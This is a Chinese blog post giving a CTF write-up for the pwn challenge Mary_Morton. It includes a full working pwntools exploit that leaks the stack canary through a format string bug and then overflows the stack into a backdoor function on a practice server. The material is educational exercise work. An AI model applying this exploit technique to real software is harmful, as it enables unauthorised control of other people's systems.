攻防世界——进阶PWN:Mary_Morton

最新推荐文章于 2023-05-15 16:06:03 发布
最新推荐文章于 2023-05-15 16:06:03 发布
阅读量404 收藏
点赞数
分类专栏: ctf相关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_36110484/article/details/106752185
版权

0x01源码分析

今天做了一道PWN题,考察了格式化字符串漏洞和绕过canary的栈溢出。比较基础,但是还是有值得记录的地方。
checksec查看,64位程序,开启了canary和栈不可执行。拖进IDA里,看到源码逻辑还是比较简单的。存在一个格式化字符串漏洞还有一个栈溢出。还有一个后门函数0x4008DA。

0x02 格式化字符串漏洞

先用老脚本看一下格式化串的相对偏移。

#search_offset.py
#encoding:utf-8
from pwn import *

context.log_level = 'debug'

n = 1
while 1:
	p = remote('220.249.52.133',51563)
	p.recvuntil("le \n")
	p.sendline("2")
	p.sendline("aaaa%{}$p".format(n))
	recv = p.recvuntil("\n")
	print recv
	if '61616161' in recv:
		print(n)
		break
	else:
		n += 1

p.interactive()

得到偏移为6,那么格式化字符串在栈中的分布大概如下所示:

容易计算出canary的偏移为6+17=23
所以我们用payload = 'aaaa%23$p’就可以泄露出canary的值

0x03栈溢出

得到canary之后,我们可以构造
payload = 0x88*‘a’+p64(canary)+0x8*‘a’+p64(back_door)完成栈溢出,覆盖返回地址为后门函数的地址。

整体的exp如下:

#coding:utf8
from pwn import *

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h'] #pwndbg适配该终端,加上这句话,我们就可以在一个终端进行分屏调试,分屏的切换一类的操作还需要查看一下tmux如何使用

ip = '220.249.52.133'
port = 51563
process_name = ''
if args.G:           #还没搞清楚是什么原理,但是用法就是在参数列表中加个G就可以进入本地调试的分支
    sh = process(process_name)
    addr=''
    gdb.attach(sh, "b *" + addr)  
else:
    sh = remote(ip,port)

back_door = 0x4008DA

sh.recvuntil('le \n')
sh.sendline('2')
payload = 'aaaa%23$p'

sh.sendline(payload)
sh.recvuntil('aaaa')
canary = int(sh.recvuntil('\n')[2:-1],16)
success(hex(canary))

sh.recvuntil('le \n')
sh.sendline('1')
payload = 0x88*'a'+p64(canary)+0x8*'a'+p64(back_door)
sh.sendline(payload)

sh.interactive()
u7ch1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1318
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
PWN做题笔记11-Mary_Morton(格式化字符串暴露canary)
最新发布
qq_40923256的博客
05-15 303
Mary_Morton,知识点是格式化字符串漏洞暴露canary
攻防世界高手进阶区 ——Mary_Morton
weixin_62675330的博客
02-26 3926
攻防世界高手进阶区 ——Mary_Morton 不容易呀,这都已经是第七题了,继续加油! 一,老规矩,先分析一下文件 checksec一下 发现开启了栈溢出,可能这个题就是学习栈溢出漏洞绕过的。 运行一下 告诉了存在栈溢出漏洞和格式化字符串漏洞。 file文件 ┌──(root💀kali)-[/home/…/面/ctf_workstation/Offensive_and_defensive_world/Mary_Morton] └─# file Mary_Morton
攻防世界-Mary_Morton
Henlenl的博客
11-30 3013
检查文件信息 amd64-elf文件 开启了Canary保护 开启了NX保护 ida静态分析 进入到sub_4008EB函数 格式化字符串漏洞 另外进入到sub_400960()函数有栈溢出漏洞 但是有一点开启了Canary 那么我们可以通过 格式化字符串任意读 泄露Canary地址 然后利用这个地址来进行溢出漏洞的利用 栈分布如图 而我们知道 v2就是用来储存canary的值的变量 而buf 大小位0x90 v2的大小位 0x8 覆盖return addr,需要0x90-0x8=0x88大小去
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2213
攻防世界pwnMary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。产品特点自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。...
browser_pwn:浏览器pwn,现在主要工作
03-22
V8_pwn: V8是Google Chrome浏览器内置的JavaScript引擎,负责快速、高效地执行JavaScript代码。V8_pwn专注于寻找和利用V8引擎中的安全漏洞。这些漏洞可能涉及内存管理错误(如堆溢出、栈溢出或类型混淆),或者是...
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 180
做题记录
PWN题——如何利用pwndbg实现本地调试
baidu_36110484的博客
05-19 3700
问题由来 在做ctf pwn题的过程中,一些复杂的题目可能需要借助调试工具进行本地调试。在没装pwndbg之前,使用gdb没法正常的调试。gdb attach的进程不知道为什么跟要调试的进程不是一个。虽然我在开始处下了断点,但是程序还是自顾自地运行。我在安装了pwndbg之后,执行到gdb.attach()后一直在waiting for debugger。随后找到一种解决方法,就是使用tmux终端。 下面记录一下我使用的模板,方便之后做pwn题。 python2环境下的模板 #coding:utf8 fro
攻防世界pwn高手进阶(持续更新)
qq_42988973的博客
12-16 511
攻防世界pwn高手进阶wp
攻防世界 Pwn 进阶 第一页
yongbaoii的博客
10-19 3010
写在最前面 我在某天中午睡了一觉之后大彻大悟 我感觉pwn最重要的是能不能找得到漏洞点,学会怎么利用这个漏洞点以及明白他的原理倒是要往后放一放,所以要来一个漏洞总结,总结我现在见到过的所有漏洞、漏洞的原理以及它的表现形式,就在攻防世界第一页之后吧,以题的形式去进行一些总结。 00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区。 攻防世界 Pwn 新手 1、栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc。 常见漏洞点有read()函数、gets()函数、strca
2021/10/18-如何调试pwn的exp或payload
个人笔记
10-19 1724
《2021年10月18日》 【连续第18天总结】 首先需要明白的是,你调试的exp.py是你输入的内容(即程序获取用户输入的信息)。 通过exp.py脚本与程序交互执行你的输入,跟手动一次次输入并无两样,所以想通过下断点调试查看你希望看到的具体位置数据的方法是一样的。 pwn调试小技巧 pwntool工具中一些好用的模块 context.log_level="debug" //输出显示调试信息,即用户输入与程序交互的信息 context.terminal = ["tmux","splitw","-h"]
【Ubuntu20.04】从零开始配置一台PWN虚拟机
qcwwww的博客
02-06 4368
从镜像网站下载了纯净的ubuntu20.04版本的系统,从零开始配置一台Pwn环境机器。静待安装的结束后,接下来是配置过程:进入清华镜像网站,选择自己所要的的ubuntu版本复制粘贴此时注意,将其中的https改为http,由于证书还未更新,所以先用http访问更新证书后改回 接下来安装证书 更新完后改回 /etc/apt/sources.list 中的https 再执行一下: 此时已经可以安装pip,在终端输入pip,系统提示没有pip也会给出这条安装命令 2 安装gadget插件 one_gadger
Mary_Morton [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列17
重新启程
12-24 1565
题目地址:Mary_Morton 已经是高手进阶区的第六题了,每个题目都有不少收获,持之以恒! 先看看题目内容 很好,这是一道非常简单的热身pwn,当然,我是不会相信的!哈哈 大家应该注意到了,难度系数第一次>1星了,步入2星的阶段,最高是10星!期待一下 惯例先来检查安全机制 root@mypwn:/ctf/work/python/mary_morton# checksec ...
攻防世界)(pwnmary_mroton
PLpa的博客
07-20 848
经过一段时间的研究,终于接触到Canary了,不容易啊 拿到本题查看保护 开了NX和Canary两种栈保护,我们运行一下出现,看一下程序逻辑: 根据我们对英语强大的理解 (翻译软件的腻量)我们可以看到1标题是栈溢出漏洞函数,2是格式字符串漏洞函数,3为退出,既然他都告诉我们了,我们也不用客气直接用就可以了。 我们可以用格式字符串漏洞泄露Canary的值,然后再进行简单的栈溢出,把Canary填...
攻防世界Pwn题:利用FSA漏洞执行cat_flag
在"攻防世界pwn题:forgot.doc"文档中,我们探讨了一个关于利用有限状态自动机(FSA)中的漏洞来实现电子邮件地址验证的挑战。福克斯设计了一个题目,其中包含了一个32位的可执行文件,具有canary和PIE保护机制关闭,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值